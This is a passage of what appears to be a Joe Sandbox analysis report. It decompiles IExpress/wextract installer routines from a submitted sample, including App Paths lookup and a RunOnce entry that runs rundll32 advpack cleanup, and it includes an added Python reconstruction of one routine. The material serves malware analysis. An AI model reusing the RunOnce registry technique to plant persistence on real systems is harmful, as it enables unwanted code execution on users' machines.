                                                                                                                                                                                                    					_t61 = 0xfd88c0;
                                                                                                                                                                                                    					_t4 =  &(_t61[1]); // 0xfd88c1
                                                                                                                                                                                                    					_t65 = _t4;
                                                                                                                                                                                                    					do {
                                                                                                                                                                                                    						_t42 =  *_t61;
                                                                                                                                                                                                    						_t61 =  &(_t61[1]);
                                                                                                                                                                                                    					} while (_t42 != 0);
                                                                                                                                                                                                    					_t5 = _t61 - _t65 + 0xfd88c0; // 0x1fb1181
                                                                                                                                                                                                    					_t44 = CharPrevA(0xfd88c0, _t5);
                                                                                                                                                                                                    					_v8 = _t44;
                                                                                                                                                                                                    					if( *_t44 == 0x5c &&  *(CharPrevA(0xfd88c0, _t44)) != 0x3a) {
                                                                                                                                                                                                    						 *_v8 = 0;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L10;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}

APIs
• LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00FD4236
• GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00FD424C
• GetProcAddress.KERNEL32(00000000,000000C3), ref: 00FD4263
• GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00FD427A
• GetTempPathA.KERNEL32(00000104,00FD88C0,?,00000001), ref: 00FD429F
• CharPrevA.USER32(00FD88C0,01FB1181,?,00000001), ref: 00FD42C2
• CharPrevA.USER32(00FD88C0,00000000,?,00000001), ref: 00FD42D6
• FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00FD4391
• FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00FD43A5
Strings
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
• String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
• API String ID: 1865808269-1731843650
• Opcode ID: de9898d1189962cbb63ea6d862a3ea69b713adf07744be3642f0f317dcefccc1
• Instruction ID: 39bbc5fca30e5d934062a54ff08425ca251baab9fef1a8c9b4ba1023a3dbfbfe
• Opcode Fuzzy Hash: de9898d1189962cbb63ea6d862a3ea69b713adf07744be3642f0f317dcefccc1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA41E174E01248AFD711AB74DC88A6E7BB7EB45394F0C016BE941A3391CB759C02FB66
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                    			E00FD44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v64;
                                                                                                                                                                                                    				char _v576;
                                                                                                                                                                                                    				void* _v580;
                                                                                                                                                                                                    				struct HWND__* _v584;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t34;
                                                                                                                                                                                                    				void* _t37;
                                                                                                                                                                                                    				signed int _t39;
                                                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                                                    				signed int _t44;
                                                                                                                                                                                                    				signed int _t49;
                                                                                                                                                                                                    				signed int _t52;
                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                    				intOrPtr _t55;
                                                                                                                                                                                                    				intOrPtr _t58;
                                                                                                                                                                                                    				intOrPtr _t59;
                                                                                                                                                                                                    				int _t64;
                                                                                                                                                                                                    				void* _t66;
                                                                                                                                                                                                    				intOrPtr* _t67;
                                                                                                                                                                                                    				signed int _t69;
                                                                                                                                                                                                    				intOrPtr* _t73;
                                                                                                                                                                                                    				intOrPtr* _t76;
                                                                                                                                                                                                    				intOrPtr* _t77;
                                                                                                                                                                                                    				void* _t80;
                                                                                                                                                                                                    				void* _t81;
                                                                                                                                                                                                    				void* _t82;
                                                                                                                                                                                                    				intOrPtr* _t84;
                                                                                                                                                                                                    				void* _t85;
                                                                                                                                                                                                    				signed int _t89;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t75 = __edx;
                                                                                                                                                                                                    				_t34 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                    				_v584 = __ecx;
                                                                                                                                                                                                    				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                    				_t67 = _a4;
                                                                                                                                                                                                    				_t69 = 0xd;
                                                                                                                                                                                                    				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                    				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                    				_v580 = _t37;
                                                                                                                                                                                                    				asm("movsb");
                                                                                                                                                                                                    				if(( *0xfd8a38 & 0x00000001) != 0) {
                                                                                                                                                                                                    					_t39 = 1;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_v576 = 0;
                                                                                                                                                                                                    					LoadStringA( *0xfd9a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                    					if(_v576 != 0) {
                                                                                                                                                                                                    						_t73 =  &_v576;
                                                                                                                                                                                                    						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                    						_t75 = _t16;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t43 =  *_t73;
                                                                                                                                                                                                    							_t73 = _t73 + 1;
                                                                                                                                                                                                    						} while (_t43 != 0);
                                                                                                                                                                                                    						_t84 = _v580;
                                                                                                                                                                                                    						_t74 = _t73 - _t75;
                                                                                                                                                                                                    						if(_t84 == 0) {
                                                                                                                                                                                                    							if(_t67 == 0) {
                                                                                                                                                                                                    								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                    								_t83 = _t27;
                                                                                                                                                                                                    								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                    								_t80 = _t44;
                                                                                                                                                                                                    								if(_t80 == 0) {
                                                                                                                                                                                                    									goto L6;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t75 = _t83;
                                                                                                                                                                                                    									_t74 = _t80;
                                                                                                                                                                                                    									E00FD1680(_t80, _t83,  &_v576);
                                                                                                                                                                                                    									goto L23;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t76 = _t67;
                                                                                                                                                                                                    								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                    								_t85 = _t24;
                                                                                                                                                                                                    								do {
                                                                                                                                                                                                    									_t55 =  *_t76;
                                                                                                                                                                                                    									_t76 = _t76 + 1;
                                                                                                                                                                                                    								} while (_t55 != 0);
                                                                                                                                                                                                    								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                    								_t83 = _t25 + _t74;
                                                                                                                                                                                                    								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                    								_t80 = _t44;
                                                                                                                                                                                                    								if(_t80 == 0) {
                                                                                                                                                                                                    									goto L6;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									E00FD171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                    									goto L23;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t77 = _t67;
                                                                                                                                                                                                    							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                    							_t81 = _t18;
                                                                                                                                                                                                    							do {
                                                                                                                                                                                                    								_t58 =  *_t77;
                                                                                                                                                                                                    								_t77 = _t77 + 1;
                                                                                                                                                                                                    							} while (_t58 != 0);
                                                                                                                                                                                                    							_t75 = _t77 - _t81;
                                                                                                                                                                                                    							_t82 = _t84 + 1;
                                                                                                                                                                                                    							do {
                                                                                                                                                                                                    								_t59 =  *_t84;
                                                                                                                                                                                                    								_t84 = _t84 + 1;
                                                                                                                                                                                                    							} while (_t59 != 0);
                                                                                                                                                                                                    							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                    							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                    							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                    							_t80 = _t44;
                                                                                                                                                                                                    							if(_t80 == 0) {
                                                                                                                                                                                                    								goto L6;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_push(_v580);
                                                                                                                                                                                                    								E00FD171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                    								L23:
                                                                                                                                                                                                    								MessageBeep(_a12);
                                                                                                                                                                                                    								if(E00FD681F(_t67) == 0) {
                                                                                                                                                                                                    									L25:
                                                                                                                                                                                                    									_t49 = 0x10000;
                                                                                                                                                                                                    								} else {
                        _t54 = E00FD67C9(_t74, _t74);
                        _t49 = 0x190000;
                        if(_t54 == 0) {
                            goto L25;
                        }
                    }
                    _t52 = MessageBoxA(_v584, _t80, "nst0dum", _t49 | _a12 | _a16);
                    _t83 = _t52;
                    LocalFree(_t80);
                    _t39 = _t52;
                }
            }
        } else {
            if(E00FD681F(_t67) == 0) {
                L4:
                _t64 = 0x10010;
            } else {
                _t66 = E00FD67C9(0, 0);
                _t64 = 0x190010;
                if(_t66 == 0) {
                    goto L4;
                }
            }
            _t44 = MessageBoxA(_v584, &_v64, "nst0dum", _t64);
            L6:
            _t39 = _t44 | 0xffffffff;
        }
    }
    return E00FD6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
}

Instruction addresses (address column of the decompiler listing above):
0x00fd44b9 0x00fd44c4 0x00fd44cb 0x00fd44d8 0x00fd44e4 0x00fd44eb 0x00fd44ee 0x00fd44ef 0x00fd44ef 0x00fd44f1
0x00fd44f7 0x00fd44f8 0x00fd467b 0x00fd44fe 0x00fd4509 0x00fd4518 0x00fd4525 0x00fd4562 0x00fd4568 0x00fd4568
0x00fd456b 0x00fd456b 0x00fd456d 0x00fd456e 0x00fd4572 0x00fd4578 0x00fd457c 0x00fd45cb 0x00fd4607 0x00fd4607
0x00fd460d 0x00fd4613 0x00fd4617 0x00000000 0x00fd461d 0x00fd4623 0x00fd4626 0x00fd4628 0x00000000 0x00fd4628
0x00fd45cd 0x00fd45cd 0x00fd45cf 0x00fd45cf 0x00fd45d2 0x00fd45d2 0x00fd45d4 0x00fd45d5 0x00fd45db 0x00fd45de
0x00fd45e3 0x00fd45e9 0x00fd45ed 0x00000000 0x00fd45f3 0x00fd45fd 0x00000000 0x00fd4602 0x00fd45ed 0x00fd457e
0x00fd457e 0x00fd4580 0x00fd4580 0x00fd4583 0x00fd4583 0x00fd4585 0x00fd4586 0x00fd458a 0x00fd458c 0x00fd458f
0x00fd458f 0x00fd4591 0x00fd4592 0x00fd459b 0x00fd459e 0x00fd45a3 0x00fd45a9 0x00fd45ad 0x00000000 0x00fd45af
0x00fd45af 0x00fd45bf 0x00fd462d 0x00fd4630 0x00fd463d 0x00fd464e 0x00fd464e 0x00fd463f 0x00fd4640 0x00fd4647
0x00fd464c 0x00000000 0x00000000 0x00fd464c 0x00fd4666 0x00fd466d 0x00fd466f 0x00fd4675 0x00fd4675 0x00fd45ad
0x00fd4527 0x00fd452e 0x00fd453f 0x00fd453f 0x00fd4530 0x00fd4531 0x00fd4538 0x00fd453d 0x00000000 0x00000000
0x00fd453d 0x00fd4554 0x00fd455a 0x00fd455a 0x00fd455a 0x00fd4525 0x00fd468c

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FD4518
                                                                                                                                                                                                    • MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00FD4554
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000065), ref: 00FD45A3
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000065), ref: 00FD45E3
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000002), ref: 00FD460D
                                                                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 00FD4630
                                                                                                                                                                                                    • MessageBoxA.USER32(?,00000000,nst0dum,00000000), ref: 00FD4666
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 00FD466F
                                                                                                                                                                                                      • Part of subcall function 00FD681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00FD686E
                                                                                                                                                                                                      • Part of subcall function 00FD681F: GetSystemMetrics.USER32(0000004A), ref: 00FD68A7
                                                                                                                                                                                                      • Part of subcall function 00FD681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00FD68CC
                                                                                                                                                                                                      • Part of subcall function 00FD681F: RegQueryValueExA.ADVAPI32(?,00FD1140,00000000,?,?,0000000C), ref: 00FD68F4
                                                                                                                                                                                                      • Part of subcall function 00FD681F: RegCloseKey.ADVAPI32(?), ref: 00FD6902
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                    • String ID: LoadString() Error. Could not load string resource.$nst0dum
                                                                                                                                                                                                    • API String ID: 3244514340-614204707
                                                                                                                                                                                                    • Opcode ID: ec0023d1a5f0d37d78df7b2679e94d4187c2c5aabeab4dbc205342bdc49bad65
                                                                                                                                                                                                    • Instruction ID: 3ce42835398d59984abe3e70ac62dbc6599987278d42b0f9208ab3ed1e3bd8f1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec0023d1a5f0d37d78df7b2679e94d4187c2c5aabeab4dbc205342bdc49bad65
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 68510572901119ABDB219F68DC48BAABB7BEF45310F0C4196FC19A7341DB35ED05EB50
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 94%
                                                                                                                                                                                                    			E00FD2773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				char _v269;
                                                                                                                                                                                                    				CHAR* _v276;
                                                                                                                                                                                                    				int _v280;
                                                                                                                                                                                                    				void* _v284;
                                                                                                                                                                                                    				int _v288;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t23;
                                                                                                                                                                                                    				intOrPtr _t34;
                                                                                                                                                                                                    				int _t45;
                                                                                                                                                                                                    				int* _t50;
                                                                                                                                                                                                    				CHAR* _t52;
                                                                                                                                                                                                    				CHAR* _t61;
                                                                                                                                                                                                    				char* _t62;
                                                                                                                                                                                                    				int _t63;
                                                                                                                                                                                                    				CHAR* _t64;
                                                                                                                                                                                                    				signed int _t65;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t52 = __ecx;
                                                                                                                                                                                                    				_t23 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                    				_t62 = _a4;
                                                                                                                                                                                                    				_t50 = 0;
                                                                                                                                                                                                    				_t61 = __ecx;
                                                                                                                                                                                                    				_v276 = _t62;
                                                                                                                                                                                                    				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                    				if( *_t62 != 0x23) {
                                                                                                                                                                                                    					_t63 = 0x104;
                                                                                                                                                                                                    					goto L14;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t64 = _t62 + 1;
                                                                                                                                                                                                    					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                    					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                    					_t63 = 0x104;
                                                                                                                                                                                                    					_t34 = _v269;
                                                                                                                                                                                                    					if(_t34 == 0x53) {
                                                                                                                                                                                                    						L14:
                                                                                                                                                                                                    						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                    						goto L15;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						if(_t34 == 0x57) {
                                                                                                                                                                                                    							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_push(_t52);
                                                                                                                                                                                                    							_v288 = 0x104;
                                                                                                                                                                                                    							E00FD1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                    							_t59 = 0x104;
                                                                                                                                                                                                    							E00FD658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                    							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                    								L16:
                                                                                                                                                                                                    								_t59 = _t63;
                                                                                                                                                                                                    								E00FD658A(_t61, _t63, _v276);
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								if(RegQueryValueExA(_v284, 0xfd1140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                    									_t45 = _v280;
                                                                                                                                                                                                    									if(_t45 != 2) {
                                                                                                                                                                                                    										L9:
                                                                                                                                                                                                    										if(_t45 == 1) {
                                                                                                                                                                                                    											goto L10;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                    											_t45 = _v280;
                                                                                                                                                                                                    											goto L9;
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											_t59 = 0x104;
                                                                                                                                                                                                    											E00FD1680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                    											L10:
                                                                                                                                                                                                    											_t50 = 1;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								RegCloseKey(_v284);
                                                                                                                                                                                                    								L15:
                                                                                                                                                                                                    								if(_t50 == 0) {
                                                                                                                                                                                                    									goto L16;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00FD6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                    			}
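The decompiled routine above is easier to reason about as a readable reconstruction. The Python below is an added example written for this report, not code from the sample or from Joe Sandbox; it mirrors the branch structure of E00FD2773 with the registry, GetSystemDirectoryA, GetWindowsDirectoryA and ExpandEnvironmentStringsA replaced by in-memory stand-ins so it runs offline on any OS. It assumes, which the page does not confirm, that E00FD658A is a path-join helper inserting a single backslash and that the value name at 0xfd1140 is the key's default value; the App Paths entries, environment and directory constants are constructed. One behaviour worth noticing when reading the C: on a failed lookup, an unexpected value type, or a failed environment expansion, whatever RegQueryValueExA already wrote into the output buffer is kept and the argument is appended to it.

```python
"""Readable reconstruction of E00FD2773 (added example, not the sample's code)."""
import re

REG_SZ = 1          # _v280 == 1: plain string, accepted as-is
REG_EXPAND_SZ = 2   # _v280 == 2: must pass through ExpandEnvironmentStringsA
MAX_PATH = 0x104    # buffer size used throughout the decompiled routine

# Constructed stand-ins for the APIs the routine calls
SYSTEM_DIR = r"C:\Windows\System32"    # GetSystemDirectoryA
WINDOWS_DIR = r"C:\Windows"            # GetWindowsDirectoryA
ENV = {"ProgramFiles": r"C:\Program Files", "LONG": "C:\\" + "a" * 300}

# Constructed view of HKLM\Software\Microsoft\Windows\CurrentVersion\App Paths\<name>
# mapping name -> (value type, default value data)
APP_PATHS = {
    "notepad.exe": (REG_SZ, r"C:\Windows\System32\notepad.exe"),
    "tool.exe": (REG_EXPAND_SZ, r"%ProgramFiles%\Tool\tool.exe"),
    "broken.exe": (REG_EXPAND_SZ, "%LONG%\\x.exe"),   # expansion will not fit MAX_PATH
    "odd.exe": (3, r"C:\odd"),                          # neither REG_SZ nor REG_EXPAND_SZ
}


def join_path(base, rest):
    """Assumed semantics of E00FD658A: append with exactly one backslash."""
    if not base:
        return rest
    if not rest:
        return base
    return base.rstrip("\\") + "\\" + rest


def expand_environment_strings(s, env):
    """Stand-in for ExpandEnvironmentStringsA. Unknown %NAMES% stay in place,
    as on Windows. The real API returns 0 only on failure; the modelled failure
    here (an assumption) is a result that does not fit the MAX_PATH buffer."""
    result = re.sub(r"%([^%]+)%", lambda m: env.get(m.group(1), m.group(0)), s)
    return None if len(result) + 1 > MAX_PATH else result


def resolve(arg, app_paths=APP_PATHS, env=ENV):
    out = ""                                   # *__ecx = 0
    if not arg.startswith("#"):                # *_t62 != '#'
        return join_path(SYSTEM_DIR, arg)      # L14 -> L15 -> L16: system dir + argument
    letter = arg[1:2].upper()                  # CharUpperA(*(arg + 1))
    rest = arg[3:]                             # CharNextA(CharNextA(arg + 1)): skip letter and separator
    if letter == "S":
        return join_path(SYSTEM_DIR, rest)     # L14 -> L16
    if letter == "W":
        return join_path(WINDOWS_DIR, rest)    # GetWindowsDirectoryA -> L16
    resolved = False                           # _t50
    entry = app_paths.get(rest)                # RegOpenKeyExA / RegQueryValueExA on App Paths\<rest>
    if entry is not None:
        vtype, data = entry
        out = data                             # RegQueryValueExA writes straight into the output buffer
        if vtype == REG_EXPAND_SZ:
            expanded = expand_environment_strings(data, env)
            if expanded is not None:           # ExpandEnvironmentStringsA != 0
                out = expanded                 # E00FD1680: copy expanded text over the buffer
                resolved = True                # L10
        elif vtype == REG_SZ:
            resolved = True                    # L9 -> L10
    if not resolved:
        out = join_path(out, rest)             # L16: keep whatever is in the buffer, append argument
    return out


def demo():
    """Resolve a few constructed arguments, one per branch of the routine."""
    samples = [r"#S\drivers\etc\hosts", r"#W\win.ini", "calc.exe",
               r"#A\notepad.exe", r"#A\tool.exe", r"#A\missing.exe",
               r"#A\broken.exe", r"#A\odd.exe"]
    return {s: resolve(s) for s in samples}


if __name__ == "__main__":
    for arg, path in demo().items():
        print(f"{arg!r:28} -> {path}")
```

The two failure cases in `demo()` are the ones to look at: `#A\missing.exe` resolves to the bare argument because the buffer was empty when the lookup failed, while `#A\broken.exe` yields the unexpanded registry data with the argument glued on, since the routine never clears the buffer after a failed ExpandEnvironmentStringsA.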
Instruction addresses for the C-code lines above, in order (0x00000000 marks a line with no address): 0x00fd2773, 0x00fd277e, 0x00fd2785, 0x00fd278a, 0x00fd278d, 0x00fd2790, 0x00fd2792, 0x00fd2798, 0x00fd279d, 0x00fd28b2, 0x00000000, 0x00fd27a3, 0x00fd27a3, 0x00fd27af, 0x00fd27c2, 0x00fd27c8, 0x00fd27cd, 0x00fd27d5, 0x00fd28b7, 0x00fd28b9, 0x00000000, 0x00fd27db, 0x00fd27dd, 0x00fd28aa, 0x00000000, 0x00fd27e3, 0x00fd27e3, 0x00fd27ec, 0x00fd27f8, 0x00fd2803, 0x00fd280b, 0x00fd2831, 0x00fd28c3, 0x00fd28c9, 0x00fd28cd, 0x00fd2837, 0x00fd285a, 0x00fd285c, 0x00fd2865, 0x00fd2892, 0x00fd2895, 0x00000000, 0x00000000, 0x00fd2867, 0x00fd2878
                                                                                                                                                                                                    0x00fd288c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd287a
                                                                                                                                                                                                    0x00fd2880
                                                                                                                                                                                                    0x00fd2885
                                                                                                                                                                                                    0x00fd2897
                                                                                                                                                                                                    0x00fd2899
                                                                                                                                                                                                    0x00fd2899
                                                                                                                                                                                                    0x00fd2878
                                                                                                                                                                                                    0x00fd2865
                                                                                                                                                                                                    0x00fd28a0
                                                                                                                                                                                                    0x00fd28bf
                                                                                                                                                                                                    0x00fd28c1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd28c1
                                                                                                                                                                                                    0x00fd2831
                                                                                                                                                                                                    0x00fd27dd
                                                                                                                                                                                                    0x00fd27d5
                                                                                                                                                                                                    0x00fd28e5

APIs
• CharUpperA.USER32(42DE454F,00000000,00000000,00000000), ref: 00FD27A8
• CharNextA.USER32(0000054D), ref: 00FD27B5
• CharNextA.USER32(00000000), ref: 00FD27BC
• RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00FD2829
• RegQueryValueExA.ADVAPI32(?,00FD1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00FD2852
• ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00FD2870
• RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00FD28A0
• GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00FD28AA
• GetSystemDirectoryA.KERNEL32 ref: 00FD28B9
Strings
• Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00FD27E4
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
• String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
• API String ID: 2659952014-2428544900
• Opcode ID: bcf41a5e03c9c23c13db4fa8aaeb6512ac317a44b72ee83f4e2e768742f11790
• Instruction ID: e10426996bddcc3dbb33471062768486d787a8bbc5745bfaaa7ccf9be52a30b6
• Opcode Fuzzy Hash: bcf41a5e03c9c23c13db4fa8aaeb6512ac317a44b72ee83f4e2e768742f11790
• Instruction Fuzzy Hash: F841A471D0012CAFDB649B64DC45AEE77BEEB25710F0840A7F545D2210DB708E85BFA5
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 62%
E00FD2267() {
	signed int _v8;
	char _v268;
	char _v836;
	void* _v840;
	int _v844;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t19;
	intOrPtr _t33;
	void* _t38;
	intOrPtr* _t42;
	void* _t45;
	void* _t47;
	void* _t49;
	signed int _t51;

	_t19 =  *0xfd8004; // 0x42de454f
	_t20 = _t19 ^ _t51;
	_v8 = _t19 ^ _t51;
	if( *0xfd8530 != 0) {
		_push(_t49);
		if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
			_push(_t38);
			_v844 = 0x238;
			if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
				_push(_t47);
				memset( &_v268, 0, 0x104);
				if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
					E00FD658A( &_v268, 0x104, 0xfd1140);
				}
				_push("C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
				E00FD171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
				_t42 =  &_v836;
				_t45 = _t42 + 1;
				_pop(_t47);
				do {
					_t33 =  *_t42;
					_t42 = _t42 + 1;
				} while (_t33 != 0);
				RegSetValueExA(_v840, "wextract_cleanup3", 0, 1,  &_v836, _t42 - _t45 + 1);
			}
			_t20 = RegCloseKey(_v840);
			_pop(_t38);
		}
		_pop(_t49);
	}
	return E00FD6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
}
Addresses: 0x00fd2272, 0x00fd2277, 0x00fd2279, 0x00fd2283, 0x00fd2289, 0x00fd22ab, 0x00fd22b1, 0x00fd22c4, 0x00fd22e0, 0x00fd22e6, 0x00fd22f5, 0x00fd230d, 0x00fd231c, 0x00fd231c, 0x00fd2321, 0x00fd233a, 0x00fd2342, 0x00fd2348, 0x00fd234b, 0x00fd234c, 0x00fd234c, 0x00fd234e, 0x00fd234f, 0x00fd236e, 0x00fd236e, 0x00fd237a, 0x00fd2380, 0x00fd2380, 0x00fd2381, 0x00fd2381, 0x00fd238f

APIs
